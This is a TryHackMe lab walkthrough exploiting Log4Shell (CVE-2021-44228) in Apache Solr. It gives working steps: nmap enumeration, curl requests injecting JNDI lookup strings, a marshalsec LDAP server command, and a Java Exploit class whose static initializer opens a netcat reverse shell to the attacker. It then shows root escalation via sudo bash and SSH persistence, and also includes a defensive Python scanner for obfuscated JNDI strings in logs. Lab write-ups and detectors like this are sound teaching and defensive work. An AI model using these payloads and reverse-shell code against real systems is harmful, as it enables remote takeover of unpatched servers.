TryHackMe Solar: Exploiting Log4j

CVE-2021-44228 (Log4Shell) is a critical vulnerability (CVSS 10.0) in the Log4j logging library that poses a major threat to Java applications hosted on the internet. Remote code execution is achieved by abusing the Java Naming and Directory Interface (JNDI) lookups that Log4j performs on strings it logs. The Solar room provides a test scenario for exploiting this vulnerability against an Apache Solr instance.


Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.


Reconnaissance

Enumeration

Nmap scan of all TCP ports:

nmap -v -p- 10.10.212.184

Further enumerate port 8983 with service/version detection:

nmap -sV -p 8983 10.10.212.184

Discovery

HTTP Server

Navigate to http://10.10.212.184:8983, which serves the Solr admin dashboard.

Among the JVM arguments listed on the dashboard, -Dsolr.log.dir is set to /var/solr/logs, so that is where Log4j writes the solr.log file on the target.

Downloaded Task Files

The task files include a solr.log file showing an example of the log output Solr normally generates. Requests to the admin endpoints are recorded there together with their query parameters, which means user-supplied input reaches Log4j as part of a logged message.

Proof of Concept

Navigate to http://10.10.212.184:8983/solr/admin/cores. Every request to this endpoint, including its parameters, is written to solr.log, so a Log4j lookup string supplied as a parameter value is evaluated by the logger.

Log4j payload (the host is replaced with an attacker-controlled LDAP server):

${jndi:ldap://ATTACKERCONTROLLEDHOST}
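The lookup string above is exactly what lands in solr.log, which is also what a defender looks for afterwards. The scanner below is an added example written for this page, not code from the room, from Solr or from Log4j. It de-obfuscates the common evasions (nested ${lower:}/${upper:} lookups, ${x:-y} default-value lookups, percent-encoding) before matching, then reports the scheme and target of each JNDI lookup. The sample lines are constructed in the solr.log format for this example, reusing the IPs from this writeup; they are not the room's task file.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the format Solr 8.x writes to solr.log. Made up for
# this example (IPs reused from the writeup); not taken from the room's task files.
SAMPLE_LOG = """\
2021-12-13 18:11:28.232 INFO  (qtp1766145354-16) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={} status=0 QTime=1
2021-12-13 18:12:03.901 INFO  (qtp1766145354-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://10.10.159.175:9999}} status=0 QTime=2
2021-12-13 18:14:47.115 INFO  (qtp1766145354-19) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${lower:j}ndi:${lower:l}${lower:d}ap://10.6.124.83:1389/Exploit}} status=0 QTime=2
2021-12-13 18:15:10.440 INFO  (qtp1766145354-20) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=%24%7Bjndi%3Armi%3A%2F%2F10.6.124.83%3A1099%2FExploit%7D} status=0 QTime=2
2021-12-13 18:16:00.001 INFO  (qtp1766145354-21) [   ] o.a.s.c.S.Request [gettingstarted] webapp=/solr path=/select params={q=*:*&wt=json} status=0 QTime=3
"""

# Innermost ${...} lookup: one that contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A (de-obfuscated) JNDI lookup: ${jndi:<scheme>:[//]<host:port/path>}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/{0,2}([^}]*)\}", re.IGNORECASE)


def _resolve_inner(m):
    """Collapse one innermost lookup the way Log4j would, for the evasion forms only."""
    body = m.group(1)
    name, _, rest = body.partition(":")
    lname = name.lower()
    if lname == "jndi":
        return m.group(0)          # the thing we are looking for; keep as-is
    if lname == "lower":
        return rest.lower()        # ${lower:J} -> j
    if lname == "upper":
        return rest.upper()
    if ":-" in body:               # ${::-j}, ${env:NOPE:-j} -> j
        return body.split(":-", 1)[1]
    return m.group(0)              # unknown lookup: leave it alone


def normalize(s, rounds=5):
    """Repeatedly percent-decode and collapse nested lookups until nothing changes."""
    for _ in range(rounds):
        new = INNER_LOOKUP.sub(_resolve_inner, unquote(s))
        if new == s:
            break
        s = new
    return s


def find_jndi_lookups(line):
    """Return [(scheme, target), ...] for every JNDI lookup hidden in one log line."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI.finditer(normalize(line))]


def scan_log(text):
    """Return [(line_number, scheme, target, original_line), ...] for suspicious lines."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for scheme, target in find_jndi_lookups(line):
            hits.append((n, scheme, target, line))
    return hits


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for n, scheme, target, _ in scan_log(text):
        print(f"line {n}: JNDI lookup via {scheme} -> {target}")
```

Run it against a real file with python3 scan.py /var/solr/logs/solr.log. The de-obfuscation is deliberately conservative: only the lookup types attackers use to hide the word jndi are collapsed, and the scheme/target are reported so the callback host can be blocked and hunted for in proxy and DNS logs.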

Creating a test scenario

Before attempting code execution, confirm the lookup is actually evaluated: point the payload at the attacking machine and run a plain TCP listener there, so that any incoming connection from the target is captured.

With a listener on port 9999 locally, the payload is sent via curl:

curl 'http://10.10.212.184:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.159.175:9999\}'

The backslashes are for curl, not for the target: curl treats braces in a URL as a globbing range, so they must be escaped (or globbing disabled with -g). The request that reaches Solr carries the literal ${jndi:...} string.

A connection from the target to the attacking system confirms that the injected foo parameter was logged and evaluated. The parameter name is arbitrary, since Solr logs every parameter it receives on this endpoint.

Set up a malicious LDAP server locally with marshalsec. It answers the target's JNDI lookup with a reference that points at an HTTP server (port 8000 here), from which the target's JVM then fetches and loads the Exploit class:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"

LDAPRefServer listens on port 1389 by default, which is the port used in the final payload. Exploit.class must be reachable at http://YOUR.ATTACKER.IP.ADDRESS:8000/Exploit.class, so an HTTP server has to be started in the directory containing it. This remote-codebase path works here because the target's JVM still trusts LDAP codebases; from JDK 8u191 onward com.sun.jndi.ldap.object.trustURLCodebase defaults to false and a different technique (such as a deserialization gadget already on the target's classpath) would be required.

Craft a Java reverse shell on the attacking machine. The static initializer runs as soon as the JVM loads the class, so merely resolving the JNDI reference executes the command:

// Exploit.java
public class Exploit {
    static {
        try {
            // requires a netcat build on the target that supports -e
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compile the exploit, targeting Java 8 bytecode so the class loads on the target's older JVM:

javac Exploit.java -source 8 -target 8

The resulting Exploit.class is hosted on the local HTTP server and delivered to the target via the JNDI payload.

Start a netcat listener on port 9999 for the reverse shell, then send the payload; 1389 is the marshalsec LDAP port:

curl 'http://10.10.212.184:8983/solr/admin/cores?foo=$\{jndi:ldap://10.6.124.83:1389/Exploit\}'

Persistence

Establishing a foothold on the box as the solr user

Check sudo privileges with sudo -l.

The solr user is allowed to run /bin/bash through sudo, so invoking /bin/bash with sudo gives a root shell.

Finally, set a password for the solr user so the target can be reached over SSH, which gives a more stable session than the netcat reverse shell.